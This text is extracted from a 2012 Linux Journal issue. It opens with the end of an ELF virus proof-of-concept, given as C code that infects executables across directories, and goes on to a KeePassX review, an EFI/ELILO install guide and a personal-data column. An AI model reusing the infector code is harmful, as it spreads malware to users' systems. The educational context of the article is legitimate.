printf("\n read() failed \n");return -1;}if(hdr.e_ident[0] != ELFMAG0 || hdr.e_ident[1]➥!= ELFMAG1 || hdr.e_ident[2] != ELFMAG2➥ ||hdr.e_ident[3] != ELFMAG3){printf("\n Not an ELF file \n");return -1;}if (hdr.e_type != ET_EXEC && hdr.e_type != ET_DYN){printf("\n Seems to be a core dump,➥skipping... \n");return -1;}/* Check for MAGIC number */if(fstat(fd1, &st) < 0){printf("\n fstat() failed \n");return -1;}offset = st.st_size - sizeof(magic);if( lseek(fd1, offset, SEEK_SET) != offset ){printf("\n lseek() failed \n");return -1;}if(read(fd1, &chkmagic, sizeof(magic)) !=➥sizeof(magic)){printf("\n read() failed \n");return -1;}/* Chk if already infected by this virus */if(chkmagic == MAGIC){printf("\n Executable is already infected➥by our virus \n");return -1;}if(lseek(fd1, 0, SEEK_SET) != 0){printf("\n lseek() failed \n");return -1;}/* create and write the virus code in a temporaryfile */strncpy(tmp_file, TMPLATE, MAX_SIZE);fd=mkstemp(tmp_file);if(fd

FEATURE ELF Virus, Part I/* Revert with actual permissions */if(fchown(fd, st.st_uid, st.st_gid) < 0){printf("\n fchown() failed \n");return -1;}if(fchmod(fd, st.st_mode) < 0){printf("\n fchmod() failed \n");return -1;}/* Rename temporary file with original filename */if(rename(tmp_file, filename) < 0){printf("\n rename() failed \n");return -1;}close(fd);free(host);infections++;printf("***Infected %s.\n", filename);#endifreturn 0;}void searchForELF(char *directory, char *virus){printf("\n Inside searchForELF \n");int count;DIR *dptr;struct dirent *ptr;int fd1, fd2;struct stat st;char filename[256];dptr = opendir(directory);ptr = readdir(dptr);/* Go and find some files to infect */if(ptr != NULL){for (count=0; (ptr = readdir(dptr))➥!=NULL &&infections < MAX_INFECT; count++){strncpy(filename, directory, 255);strcat(filename, "/");//printf("\n [%s] \n",filename);strncat(filename, ptr->d_name,➥ 255-strlen(filename));//printf("\n [%s] \n",ptr->d_name);fd1=open(filename, O_RDONLY, 0);printf("\n Found ==> [%s] \n",filename);if(fd1 >= 0){fstat(fd1, &st);if(S_ISDIR(st.st_mode)){ // if a directoryprintf(" It is a directory\n");if(!(strcmp(ptr->d_name, ".."))➥&& (!strcmp(ptr->d_name, ".")) )searchForELF(filename, virus);}else if(S_ISREG(st.st_mode)){// if a regular filefd2=open(filename, O_RDWR, 0);if(fd2 >= 0)infect(filename, fd2, virus);➥//function that infects the executableelseprintf("\n Could not open➥ [%s]\n",filename);}close(fd2);}close(fd1);}closedir(dptr);}}void launch_attack(void){// This function is left as a dummy as this code is// only proof of concept, and I did not want to// expose any dangerous stuff.printf("\n Attack launched \n");}102 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

KeePassX:Keeping YourPasswords SafeThe advantages of using KeePassX as asecure and easy-to-use password manager.ANTHONY DEANFor a long time, my passwordtracking system was quitesimplistic: hope I remembered theright passwords for each site or recordthem in an ordinary word-processordocument. Such methods obviouslyhave great flaws. I might have a hardtime remembering a password for aninfrequently used site, and a wordprocessordocument isn’t the mostsecure place to store passwords. Sucha system also tends to promote eithertoo-simplistic passwords or recyclingthe same password across Web sites(both being easier to remember). Forthese and other reasons, I decided usinga password manager would make mydigital life a lot easier.A password manager is a program thatstores passwords. The stored passwordsusually are encrypted for securitypurposes. Password managers can beeither desktop-based (the passworddata stored in an encrypted databasefile on a hard drive), portable (similarto the desktop version, but stored on asmartphone or similar device) or on-line(data stored in an encrypted form on atrusted third-party Web site). Besidesthe increased security (over writingdown passwords on a piece of paper orwithin an unencrypted text document,or resorting to memory), passwordmanagers also allow for more complex(thus, harder to guess/break) passwordsto be created and stored. After someresearch, I decided to use KeePassX as mypassword manager of choice.104 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

General FeaturesKeePassX is a multiplatform, opensourcepassword manager. Unlikesome password managers, KeePassX isdesktop-based, which has its advantagesand disadvantages. However, KeePassXcan be used along with an on-linestorage system, such as Dropbox (I discusshow to do that later in this article).KeePassX comes with various features,including the ability to import and exportpasswords, search functionality, organizepasswords/user names within predefinedcategories and a secure passwordgenerator. KeePassX also comes with alimited AutoType feature, or the abilityto enter user name and/or passwordinformation automatically on a Web pagefrom an entry.Password information is stored in anencrypted 256-bit database file, which iscompatible with other platforms’ versionsof KeePassX (including KeePassDroidfor Android smartphones, KeePass forWindows and so on). However, forcompatibility, password files createdby other versions must be stored in theolder (version 1.x) format that KeePassXuses, versus the current (at the time ofthis writing) 2.x version, although workis being done to allow a future version ofKeePassX to use the newer format.Setup and Basic UsageKeePassX is available in manyrepositories; thus, installation shouldfollow standard procedures for yourdistro of choice.Upon initial launch, KeePassX promptsthe user to create a new database. Asshown in Figure 1, the Set Master Keybox will be displayed, asking one (bydefault) to create a master passwordfor the database. You should choose astrong master password. An alternateoption is to use a key file instead of orin addition to a password (more on keyfile usage later). For most of this article,however, I use only a master passwordfor my examples.Figure 1. The Set Master Key BoxAfter creating the password, thedefault main window (Figure 2) appears,displaying (in menus and a toolbar)most of KeePassX’s features. The menusconsist of File (importing and exportingdatabase formats, saving changes todatabases and so on); Entries (adding,deleting and making changes to entries,as well as copying entry information tothe clipboard); Groups (organizing entryinformation into various categories);View (toolbar/entry information displaysettings); Extras (settings for KeePassXWWW.LINUXJOURNAL.COM / JANUARY 2012 / 105

FEATURE KeePassXitself, as well as the password generator);and Help (links to KeePassX’s Web site,FAQ list and so on).date for the password); Attachment(attach a file to the entry); and Tools(a pop-up menu). A quality progressbar also is included under the passwordsection, indicating the password’srelative strength.Figure 2. The Main KeePassX WindowBy default, two groups are createdin a new database: Internet and Email.To create a new category, chooseGroups→Add New Group, then enterthe name of the new group in the GroupProperties window that appears. You alsocan choose an icon for the new groupfrom the pop-up menu. After finishing,select OK. The new category will appearin the left-hand pane.To enter a new password and/or username into KeePassX, select a categoryfrom the left-hand pane for the newpassword, then either select Entries→Add New Entry or choose Add New Entryfrom the toolbar. A New Entry windowappears (Figure 3), allowing you to enterpassword and user name information,along with any other needed information.Additional information you can enterincludes Title (a name for the entry);Username; Password; Repeat (enter thesame password twice for verification);Comment (to enter comments about theentry); Expires (set an optional expirationFigure 3. The New Entry Window for EnteringNew User Names and PasswordsThe Tools pop-up menu containstwo options:n AutoType: Customize sequence—customize the sequence ofpassword/user name informationentered into forms.n AutoType: Select target window—select which application or browserwindow to enter password/user nameinformation.106 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

For extra security, the password canbe shown or hidden (displaying asterisks)by clicking the eye icon next to thepassword entry boxes.The password generator is available byclicking the Gen button within the NewEntry window (or from Extras→PasswordGenerator). A box as shown in Figure4 appears. This feature allows you tocreate a random, strong password. Threetabs are available within the generator:Random, Pronounceable and Custom.Under Random, you can select variouscriteria for generating a password,based on types of characters used,uppercase or lowercase and so on. UnderPronounceable, some similar optionsto Random are available, althoughthe selections here are to generate apassword exclusively or near exclusivelywith letters. Finally, under Custom,an entry box is shown, allowing youto type in a word or phrase to definewhat characters are used to generate apassword. The bottom of the passwordgenerator includes several features, suchas setting the length of the password,a password bit strength indicatorand use of an entropy generator. Theentropy generator creates a random setof data (based on keyboard activity ormouse movement) upon which to basegenerated passwords.The Expire option in the New Entrywindow allows you to set a dateindicating how long the passwordshould last. This can serve as aFigure 4. KeePassX’s Password Generatorreminder to change passwords regularlyfor extra security. To view whichpasswords already have expired, selectExtras→Show Expired Entries.To use a stored user name or password,KeePassX has two options: eithercopy the information from KeePassXand paste it into the required entryareas, or select the AutoType feature.To copy the information, select eitherCopy Username to Clipboard or CopyPassword to Clipboard from thetoolbar, or choose the same-namedoptions under the Entries menu. ForAutoType, select Entries→PerformAutoType while the browser is open tothe desired login page; the informationwill be entered automatically.To lock KeePassX from others’ use(such as when you step away from thecomputer), select File→Lock Workspace,WWW.LINUXJOURNAL.COM / JANUARY 2012 / 107

FEATURE KeePassXFigure 5. KeePassX’s Main Window, with an Entry DisplayedFigure 6. An Entry with User Name and Password Information Hiddenor select Lock Workspace from thetoolbar. To unlock KeePassX, select theUnlock button displayed, and enter thedatabase’s master password. For moreprivacy, an option also exists to hidepasswords and/or user names. Go toView and select Hide Usernames and/or Hide Passwords. Asterisks will bedisplayed in place of the user namesand/or passwords.108 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

If you have multiple databasesto manage, KeePassX also offers abookmark feature. To bookmark adatabase file, select File→Bookmarks,and choose either Add Bookmark(to bookmark a database file) orBookmark This Database (to bookmarkthe presently open database). Thebookmarks then will appear underthe Bookmarks menu. There’s also aManage Database option to manageexisting bookmarks.To import or export database files,go to File and select Import from orExport to. Import formats besidesKeePassX include PwManager andKWallet. Export formats includeKeePassX and as a text file.Advanced Use: Cloud-Based DatabaseFile Storage and Smartphone AccessOne popular advanced use for KeePassXis to keep a password database storedin an on-line storage medium, such asDropbox. Besides serving as a meansof database backup, this also lets youaccess and update a password filefrom any number of devices, includingFigure 7. A Dropbox Directory, Containing a Password DatabaseWWW.LINUXJOURNAL.COM / JANUARY 2012 / 109

FEATURE KeePassXsmartphones. This is done usingKeePassX’s sibling versions for varioussmartphone OSes, including the versionI use here, KeePassDroid for Androidsmartphones. (Instructions should besimilar for those with iOS, Windows orBlackBerry smartphones.)To start, access (or create if you don’thave one) your Dropbox account. Then,move the database file to your Dropboxdirectory (Figure 7). Next, open KeePassXand select File→Open Database (or OpenDatabase from the toolbar). Select thedatabase file from your Dropbox folder,and then enter your master password anduse KeePassX as usual.To set up your Android smartphoneto access the password database,install KeePassDroid (and, if not alreadyinstalled, the Android Dropbox app)from the Android Market. Next, launchDropbox, and select the database file.KeePassDroid then launches and opensthe file, displaying a master passwordentry box. After entering the masterpassword, a smartphone-friendlyinterface showing the various passwordgroups will be displayed. Functionsare available for going to an enteredURL, as well as copying and pasting auser name and password. Entering ormodifying user names and/or passwordsalso is offered by KeePassDroid, whichwill update the database file storedon Dropbox (and, of course, allow youto access the new information fromKeePassX on a desktop).As shown previously, this allowsKeePassX to have some of the functionalityof an on-line password manager, whilemaintaining the advantages of beingdesktop-based. Although I’ve not tried it,this method should be similar (availablesmartphone app permitting) for othercloud-based storage systems, such asUbuntu One (which also has an Androidapp available).EncryptionKeePassX offers two types of 256-bitencryption: AES and Twofish. The typeof encryption used may be changed byaccessing File→Database Settings. AES isthe default, and although Twofish may beused, it’s compatible only with KeePassX’sversion 1.x database format. Therefore,it’s probably best to leave this option asthe default.Key FileInstead of a master password, adatabase can be opened using a key file.A key file is a file that stores data (suchas a master password or random data),and it is stored elsewhere (on the samehard drive, on a USB drive and so on).One advantage of a key file instead of amaster password is that an actual file isrequired to open the database. Becausethe key file can be stored elsewhere(such as on a separate USB drive), thisalso serves as a security option. Anotheradvantage is that a key file may containlengthy or complex data. However, one110 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

downside is that anyone who findsthe key file can open the database,similar to somebody that discovers themaster password. Also, if the key file islost (or damaged, deleted or anythingsimilar) or if any information in the fileis changed, opening the database willbe impossible.For extra security, both a masterpassword and a key file may be requiredfor accessing a database.To use a key file, under File→ChangeMaster Key (or in the Set Master Keywindow, if initially creating a database),select the key file check box. If adesired key file doesn’t already exist,select Generate Key File to create one,then select a name and storage locationfor the file. To open the database usinga key file, select the check box nextto key file (and the check box next topassword too if required), and clickBrowse. Browse to wherever the key fileis stored, select it, then select OK toopen the database.Differences between KeePassXand LastPassAnother popular password manageris LastPass. Unlike KeePassX, LastPassis proprietary instead of open source,and it relies on a cloud-based solution(storing encrypted password informationon-line). LastPass comes as a plugin formost browsers and is compatible withLinux. Similar features to KeePassXinclude password generation and anability to fill in login information for Websites. However, some advanced features,including support for smartphones andremoving advertising, requires upgradingto a $12/year “premium” version.LastPass also requires Internet access forits full cloud-based use, which might bean issue for some.ConclusionKeePassX is a very useful and valuablepassword manager. Its storagecapabilities and strong passwordgenerator have helped me greatlyimprove my on-line security over myformer password-tracking methods.KeePassX’s cross-platform compatibilityalso provides versatility in conjunctionwith its sibling application KeePassDroid.Although there are other good passwordmanagers, KeePassX in particular isworth trying.■Anthony Dean works as a freelance writer and file clerkin Milwaukee, Wisconsin, and he has been a Linux usersince 2005. Anthony may be reached through his Website at http://www.anthonynotes.com.ResourcesKeePassX: http://www.keepassx.orgKeePassX FAQ: http://www.keepassx.org/faqKeePassDroid: http://www.keepassdroid.comLastPass: http://lastpass.comWWW.LINUXJOURNAL.COM / JANUARY 2012 / 111

INDEPTHUsing Linuxwith EFI, Part II:Preparing to Installon an EFI ComputerHow to identify your firmware and partition your disk beforeinstalling Linux on an EFI computer. RODERICK W. SMITHIn my last article (December 2011), Idescribed some of the key characteristicsof the Extensible Firmware Interface(EFI) and its second-generation variant,Unified EFI (UEFI). To recap, EFI (I usethis acronym to refer to either variantgenerically) is the replacement for theelderly Basic Input/Output System (BIOS)firmware that most PCs have used for30 years. EFI provides a number ofimprovements over BIOS, but the mostimportant from a Linux perspectiveis that EFI systems boot in a mannervery different from BIOS systems. Thisfact necessitates the use of differentbootloaders, or at least different versionsof bootloaders—some are available forboth BIOS and EFI systems.This article continues the EFI story bydescribing the preparatory steps youshould take prior to installing Linux onan EFI-based computer. Specifically, youshould know how to identify your firmwareand how to partition your disk. Althoughmost installers set up an EFI bootloader, Ialso describe ELILO configuration here. Thisknowledge may help you get a recalcitrantinstaller to boot.This series continues with twomore parts, which cover actual Linuxinstallation procedures and maintenanceof a Linux system that’s been installedin EFI mode, respectively.Identifying Your FirmwareBefore proceeding with EFI-specific112 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

INDEPTHpreparations for installation, you maywant to verify that your firmware is (oris not) EFI-capable. As noted in Part I,this task isn’t always simple, becausemany computers use EFI, but don’tadvertise the fact, and use firmwareinterfaces that look just like those onold-style BIOSes. Many manufacturerscall their EFI firmwares “BIOSes”, andthey often ship with BIOS-compatibilitymodes that enable them to boot OSesusing legacy BIOS bootloaders. (Thisfeature sometimes is referred to as theCompatibility Service Module, or CSM.)Some steps you can take to identifyyour firmware’s capabilities includethe following:n Check your model: all Intel-based Macsare EFI-based. So are most (perhapsall) PCs based on Intel’s Sandy BridgeCPUs, which began shippingin quantity in the spring of 2011.AMD-based systems based on EFIstarted to become popular in mid-2011.Some models from before 2011 alsoare EFI-enabled, although they’re rarer.n Check the manual: read yourcomputer or motherboard’s manual—particularly the section on bootoptions. If there are references to“EFI” or “UEFI” boot modes, thosemodes enable EFI boot capabilities.If the firmware includes a “legacy”boot mode, that option refers to BIOSboot capabilities, the implicationbeing that the normal boot mode usesEFI. The lack of any such option mightmean your firmware is a conventionalBIOS; however, some systems lack anyexplicit options on this score. Youcan search for these terms using aPDF version of the manual, whichmost manufacturers make availableon their Web sites.n Check your boot options: even if themanual makes no explicit mention ofEFI, UEFI or legacy boot options, suchoptions may be present in the bootmenu in your computer’s firmwaresetup utility. There also can be a cluein the form of multiple options toboot a single medium. For instance, ifI insert an optical disc that’s bootablein EFI mode into a computer basedon an Intel DG43NB motherboard andthen press F10 at boot time, the bootmenu includes two options to bootfrom my DVD drive. One is labeled“PATA: HP DVD Writer 1040r”, andthe other is labeled “INTERNAL EFISHELL: HP DVD Writer 1040r”. Thefirst boots the disc in BIOS mode, andthe second boots the disc in EFI mode.n Check your boot state: you can trybooting the computer and then checkthe status of the boot mode (I’llWWW.LINUXJOURNAL.COM / JANUARY 2012 / 113

INDEPTHdescribe this in Part III of this series).n Check your Windows installation:Windows ties its partition table typeto its firmware type. It installs only toGUID Partition Table (GPT) disks in UEFImode and only to Master Boot Record(MBR) disks in BIOS mode. Thus,if a working Windows installationuses GPT, you can be sure that yourfirmware includes UEFI support. If thedisk is in MBR mode, you can be sureyour firmware includes BIOS support.Such a system also might supportUEFI boots, but if you intend to keepbooting Windows, it’s probably best totreat it like a BIOS computer.If you’ve identified your firmware assupporting EFI, you can proceed withpartitioning your disk and preparing foryour Linux installation.Partitioning a Disk for EFIMost EFI-based computers use the GPTpartitioning system. Although it’s possibleto boot an EFI-based computer using theolder MBR system, such a configurationis unusual. Most Linux distributions useGPT automatically when they install in EFImode; however, it’s sometimes easier toinstall in BIOS mode and then switch toEFI mode for booting the computer. If youdo so, you may need to pre-partition thedisk explicitly using GPT before installingthe OS. You also may want to pre-partitionyour disk so that you can set up certaindetails in the ways you want.In Linux, you can use either of twofamilies of tools to partition a diskusing GPT:n The libparted family: tools based onlibparted support both MBR and GPT,but MBR is normally the default. Touse GPT on a blank disk, you must tellthe tool explicitly to create a GPT disklabel. In GNU Parted, the commandto do this on /dev/sda is parted/dev/sda mklabel gpt. UsingGParted, you should select theDevice→Create Partition Table menuoption, click the Advanced button inthe resulting dialog box (Figure 1),select “gpt” as the partition tabletype, and click the Apply button.n The GPT fdisk family: you can usegdisk, cgdisk or sgdisk to preparea GPT disk. These tools use GPT bydefault, so you don't need to doanything special to do the job. They’redesigned to work like the Linux fdisktools, but for GPT disks. (Note: I’m theauthor of the GPT fdisk tools.)Whatever tool you use, you canpartition your disks much as you wouldusing MBR on a BIOS-based computer,but with a few twists:n To boot in EFI mode, most EFI-basedcomputers require an EFI SystemPartition (ESP). This partition should114 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

INDEPTHFigure 1. You must tell GParted explicitly to useGPT when creating a new partition table.have a FAT-32 filesystem, which youmay need to create with mkdosfs. Irecommend creating a 200 MiB to300 MiB ESP as the first partition onthe disk. To create an ESP using alibparted-based tool, create a normalFAT-32 partition and then set the “bootflag” on this partition. To create an ESPwith GPT fdisk, create a partition andset its type code to 0xEF00.n To boot in BIOS mode using GRUB2, it’s helpful to have a BIOS BootPartition. This partition can be tiny—as small as 32 KiB, although 1 MiB isa more common size. In a libpartedbasedtool, you can create a partitionwithout a filesystem and then setthe bios_grub flag on it. In GPTfdisk, create a partition and set itstype code to 0xEF02. If you plan todo a pure EFI installation, a BIOS BootPartition isn’t necessary; however, ifyou have to fall back to a BIOS-modeinstallation followed by a change toEFI mode, a BIOS Boot Partition canbe helpful. Therefore, I recommendyou create one.n Some OSes, such as OS X, like tosee gaps of about 128 MiB betweentheir partitions. Thus, you may wantto create your disk with such gaps,particularly after Hierarchical FileSystem Plus (HFS+) partitions on a Mac.n If you’re dual-booting betweenWindows and Linux, you shouldbe aware that in the past, Linuxinstallations used the Windowsfilesystem type code on GPT disks forLinux partitions. This practice resultedin Linux partitions showing up asunpartitioned Windows disks insideWindows—a potentially dangeroussituation! Versions of GPT fdisk since0.7.2 have provided a new type code(0x8300) to use for Linux partitionsto avoid this problem. This type codewill be supported in future versionsof libparted too, and it will be usedby default, but this support is not yetavailable, as of libparted 3.0.0. Youcan use GPT fdisk to change the typecode after installing Linux if you wantto make Linux partitions invisible to adual-booted Windows installation.One of the advantages of GPT overMBR is that GPT lacks the distinctionbetween primary, extended and logicalpartitions. Instead, GPT supports up to128 partitions by default, all of whichact like MBR primary partitions.If you use a libparted-based tool topartition, be aware that what such toolsWWW.LINUXJOURNAL.COM / JANUARY 2012 / 115

INDEPTHrefer to as a “boot flag” on GPT disksis actually the type code for an ESP. Youshould not set this flag on anythingbut the ESP. This contrasts with MBRdisks, on which the “boot flag” mustsometimes be set on an OS partition thatholds a bootloader.Configuring ELILOEach of the four Linux EFI-capablebootloaders described in Part I of thisseries (ELILO, Fedora’s patched GRUBLegacy, GRUB 2 and Linux kernel patches)requires its own configuration. Describingall of them is beyond the scope of thisseries, so I’ve chosen just one to describein detail: ELILO. I selected ELILO becauseit’s widely available, easy to configure andreliable. You may not need to configureELILO; if your distribution installssomething else and it works, you mayas well stick with what it installs. Even ifyou need to install ELILO, you may notneed to do so until after you install yourdistribution. I describe it here becauseit’s sometimes necessary to install ELILObefore installing Linux in order to get theinstaller to boot in EFI mode.You can obtain an ELILO tarball fromthe main ELILO Web site (see Resources),or you may be able to use a packagethat’s provided with your distribution.A distribution-provided package may behard to use if you need to install ELILObefore installing your distribution though.You should begin by creating a homefor ELILO on your ESP. Several possiblehomes exist:n You can store the binary in the EFI/BOOT directory as bootx64.efi. Thismakes ELILO run as the defaultbootloader if you haven’t configuredyour EFI to know about any others.If a file of this name already existsthough, be sure to back it up!n Distributions normally place the elilo.efifile in a subdirectory named afterthemselves, such as EFI/BOOT/susefor OpenSUSE.n If you multiboot with other OSes,you may want to create a directorycalled EFI/elilo and store elilo.efi there.This placement, however, will requirethat you use the efibootmgr utilityor a similar feature in the EFI’s userinterface to add ELILO to the EFI’sboot manager.Which approach works best dependson your needs and system. If your ESPdoesn’t contain any other bootloaders,the default EFI/BOOT/bootx64.efifilename usually works well. If you canboot your Linux installer in EFI modeand run efibootmgr, using anothername may work.A complete ELILO installation on theESP will include at least four files:n elilo.efi or bootx64.efi: this file is the ELILObinary. You must copy it to the ESP from116 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

INDEPTHthe ELILO package. (It’s calledelilo-{version}-{arch}.efiinside the main ELILOpackage file, where{version} is the versionnumber and {arch} is anarchitecture code.)n elilo.conf: this is theELILO configuration file,which I describe in moredetail shortly.n A Linux kernel file: ELILOloads the Linux kernelfrom the ESP, so younormally place this filein the ELILO directory.n A Linux initial RAM disk file:ELILO loads this file, like thekernel, from the ESP.Listing 1. A Sample ELILO Configuration Fileprompttimeout=50default=kernel304#chooser=textmenuimage=vmlinuz-2.6.38-8-genericlabel=linuxinitrd=initrd.img-2.6.38-8-genericread-onlyroot=/dev/seeker/u1104append="reboot=a,w"image=bzImage-3.0.4label=kernel304initrd=initrd.img-3.0.4read-onlyroot=/dev/seeker/u1104append=""straight into the default kernel.You can store more than one kerneland initial RAM disk on the ESP if youwant to have a choice of kernels or ifyou multiboot multiple distributions,each of which has its own kernel andinitial RAM disk.The ELILO configuration file’s formatis similar to that of LILO, the BIOSbootloader (Listing 1).The first few lines of Listing 1 setglobal ELILO options:n prompt tells ELILO to show a promptat boot time rather than to bootn timeout=50 sets the timeout period to5 seconds. Note that the timeout periodis measured in tenths of a second.n default=kernel304 sets thedefault kernel to the one labeledkernel304. ELILO boots this kernelif the timeout period passes withouta key press from the user.n chooser=textmenu sets the userinterface style to a menu rather thana prompt at which you must type anentry. This option seems to be brokenWWW.LINUXJOURNAL.COM / JANUARY 2012 / 117

INDEPTHthough; it’s always produced a blankdisplay for me, although it accepts keypresses as I’d expect. Therefore, I’vecommented it out by placing a hashmark (#) at the start of its line.Listing 1 presents two stanzas followingthe global options. Each stanza describesone kernel that ELILO can boot. Eachstanza consists of several lines:n image= identifies the Linux kernelfile, which normally appears in thesame directory as the elilo.efi file.n label= gives the stanza a name. ELILOshould display this name in its menuif you use the chooser=textmenuoption, or you can type this nameat the ELILO prompt when using thedefault option. The name must notcontain spaces.n initrd= identifies the initial RAMdisk file.n read-only is a standard part ofthe configuration.n root= identifies the Linux root (/)filesystem. Listing 1 shows a rootfilesystem on a Logical VolumeManager (LVM) configuration, but ifyou don’t use LVM, you’ll probablyspecify a regular device filename, suchas /dev/sda3, or identify a device byUUID, as in root=UUID=c607bd95-8edf-4eb1-aa93-12db8f0e66a2.n append= enables you to add arbitrarykernel options. The first stanza inListing 1 uses the reboot=a,woption, which works around problemson some systems that cause thecomputer to hang when rebooted.Many distributions use additionaloptions to enable graphical bootdisplays or other features. Youoften can omit such options, butsometimes they’re necessary forproper functioning.If you copy the files into EFI/BOOTand rename elilo.efi to bootx64.efi,you may be able to reboot into ELILO.If you copy the files into anotherdirectory though, you may need to usethe efibootmgr program to add ELILOto the ESP’s list of bootloaders. Thisprogram will work only if the computeralready is booted in EFI mode. You musttype this command on the computer onwhich you want to use it; it stores datain the computer’s NVRAM, not on thehard disk. To use it, you would type acommand like the following:efibootmgr -c -l \\EFI\\elilo.efi -L ELILOThis command adds the EFI/elilo.efifile to the EFI’s bootloader list, usingthe menu name ELILO. Note that youmust use a double backslash (\\) as adirectory separator, and the filename is118 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

INDEPTHrelative to the ESP. You can use additionalefibootmgr commands to control theorder of entries in the EFI’s boot list,to delete items from the list and so on.(Part IV of this series will describe theseoptions in more detail.)If you’re having problems booting yourdistribution’s installer in EFI mode, you canset up ELILO on your hard disk, copyingthe kernel and initial RAM disk fromthe installer’s disc image to the ESP andcreating an elilo.conf file that referencesCorrectionto Part IIn Part I of this series (December2011 issue), due to a taggingerror, the text that read “The oldMBR partition system is limitedto 232 sectors, which works outto 2 TiB on disks with 512-bytesectors. GPT uses 64-bit pointers,so its limit is 264 sectors, or 8 ZiB(zebibytes).”, should have been“The old MBR partition systemis limited to 2 32 sectors, whichworks out to 2 TiB on disks with512-byte sectors. GPT uses64-bit pointers, so its limit is 2 64sectors, or 8 ZiB (zebibytes).”LJ apologizes for the error.them. I’ve found such tricks to be veryuseful in the past, although as I’ll describein Part III, the latest round of distributionshas greatly improved EFI support, so withany luck, you won’t need to do this.Once it’s properly installed and booted,ELILO presents a simple prompt:ELILO boot:Press the Enter key to boot thedefault kernel, press the Tab key tosee a list of options, or type an optionname to boot it.Next TimePart III of this series covers OS installationusing two methods: direct EFI installationsand converting a BIOS-mode installationto boot in EFI mode.■Roderick W. Smith is a Linux consultant, writer and open-sourceprogrammer living in Woonsocket, Rhode Island. He is theauthor of more than 20 books on Linux and other open-sourcetechnologies, as well as of the GPT fdisk (gdisk, cgdisk andsgdisk) family of partitioning software.ResourcesYou can read about and obtain GPT fdisk (gdisk, cgdiskand sgdisk) from http://www.rodsbooks.com/gdisk ifyour distribution doesn’t provide it.ELILO is based at http://elilo.sourceforge.net.Apple’s Technical Note 2166 (http://developer.apple.com/library/mac/technotes/tn2166) details OS X’srequirements for partitioning, which may be important toknow when installing Linux on a Mac.WWW.LINUXJOURNAL.COM / JANUARY 2012 / 119

EOFDOC SEARLSIs There a “PersonalData Economy” If YouControl Your Own Data?What happens to the market for personal data when personsactually control their own?One year ago this month, theWorld Economic Forum put outa report titled “Personal Data:The Emergence of a New Asset Class”.Investopedia defines asset class as “agroup of securities that exhibit similarcharacteristics, behave similarly in themarketplace, and are subject to the samelaws and regulations. The three mainasset classes are equities (stocks), fixedincome(bonds) and cash equivalents(money market instruments)”, and itadds, “It should be noted that in additionto the three main asset classes, someinvestment professionals would add realestate and commodities, and possiblyother types of investments, to the assetclass mix.”Is personal data any of those things? Ifanything, it’s one of those “other typesof investments”, but is it a security inany sense? Investopedia says “a securityis essentially a contract that can beassigned a value and traded”. Examplesinclude “a note, stock, preferred share,bond, debenture, option, future, swap,right, warrant, or virtually any otherfinancial asset”.Well, it’s clearly a financial asset—just not for you. That’s because theasset is data about you—not your datayou own, personally.According to the Winterberry Group,“Marketing Data & Related ServicesSpending” in the US will be $7.8billion this year. Most of that is fordirect mail, where spending has beendeclining over recent years. The growthmarket is spending on data guidingdigital media: on-line and e-mail. Thatwon’t reach a $billion this year, but itwill soon enough.120 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

EOFThe fantasy is that this will be welcomed byindividuals. The reality is that it’s creepy.The big spending aims towardwhat has long been a holy grail ofadvertising: delivering messagesthat are perfectly personalized andperfectly timed. Right now, they callthis “customer-centric messaging”,“content-optimized interactions”,“right-time decisioning” and stuff likethat. The fantasy is that this will bewelcomed by individuals. The realityis that it’s creepy.Advertising always has beenguesswork—the more accurate, thebetter. But once advertising on digitalmedia becomes perfectly personal andperfectly timed, is it still advertising?No, it’s a robot with bad manners.But the fantasy is alive and well, sothe market for data about you is stillthere, and growing. What can you doabout it?There are several approaches. One is toLinux JournaLnow availablefor the iPad andiPhone at theApp Store.linuxjournal.com/iosFor more information about advertising opportunities within Linux Journal iPhone, iPad andAndroid apps, contact Rebecca Cassity at +1-713-344-1956 x2 or ads@linuxjournal.com.

EOFcreate a market for personal data that youparticipate in. Statz (https://www.statz.com/Sell/Statz_Take_Control_and_Own_Your_Data.aspx), for example, callsitself The Data Marketplace, and it givesyou this pitch:Benefit From the Data EconomyYou may not even know it, but you’rein the data business. Data about yourphone calls, prescriptions, home energyuse, purchases, investments and moreis being sold every day. Without yourpermission or profit.Statz lets you gather all your behavior,product usage, and activity data—FREE—and participate in the consumer-datamarket, anonymously and securely. Andmake money.Other companies—Personal.com,Connect.me, Mydex.org, Trustfabric.com,Azigo.com, Singly.com—also work invarious ways to protect your personaldata (or, in the case of Connect.me,your reputation), though none have Statz’business model. (Not exactly, anyway.They’re all different.)All in various ways either use ordevelop open-source code. For LinuxJournal readers, Singly stands out forits open-source pedigree and growthvectors. It was cofounded by JeremieMiller of Jabber and XMPP fame.Last year, they also brought in MattZimmerman as CTO. He was the foundingCTO of Ubuntu. The code bases tocheck out and contribute to are theLocker Project (http://lockerproject.org)and TeleHash (http://telehash.org).Of the former, they say, “A Locker givespeople ownership over their personaldata and clear control over how it’sprotected and shared. Providing flexibleAPIs for access to that data, Lockers area powerful way for developers to buildapplications that leverage rich personaldata.” It’s “licensed under the threeclauseBSD License” and “primarilydeveloped using node.js, with a bit ofPython to facilitate some integrationpoints. We use npm to help manageinternal system dependencies, and wetry to follow TDD/BDD as enthusiasticallyas our time will allow.”TeleHash “works by sending andreceiving small bits of JSON via UDPusing an efficient routing systembased on Kademlia, a proven andpopular Distributed Hash Table.Everything within TeleHash is routedbased on a generic SHA hash of therelated id or URL.”Okay, back to the personal datamarketplace. While there are wellmeaningefforts on the governmentside, such as “do not track” legislationproposed in the US and the “Midata”122 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

